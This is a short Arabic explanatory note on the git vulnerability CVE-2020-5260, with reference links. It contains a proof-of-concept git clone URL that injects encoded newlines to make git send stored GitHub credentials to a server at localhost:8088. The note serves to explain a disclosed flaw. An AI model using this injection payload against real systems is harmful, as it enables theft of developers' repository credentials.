CVE-2020-5260
CVE-2020-5260 توضيح
- عند تنفيذ git لأوامر مثل "git clone https://example.com"، يطلب استخدام بروتوكول "https" لتخزين بيانات الاعتماد للمضيف "example.com"، وعند طلب المصادقة من الطرف البعيد، يقوم بإرفاق بيانات الاعتماد التي تم إرجاعها بالطلب المرسل
git clone 'http://localhost:8088/%0ahost=github.com%0aprotocol=https

روابط مرجعية:
https://bugs.chromium.org/p/project-zero/issues/detail?id=2021
https://github.com/brompwnie/cve-2020-5260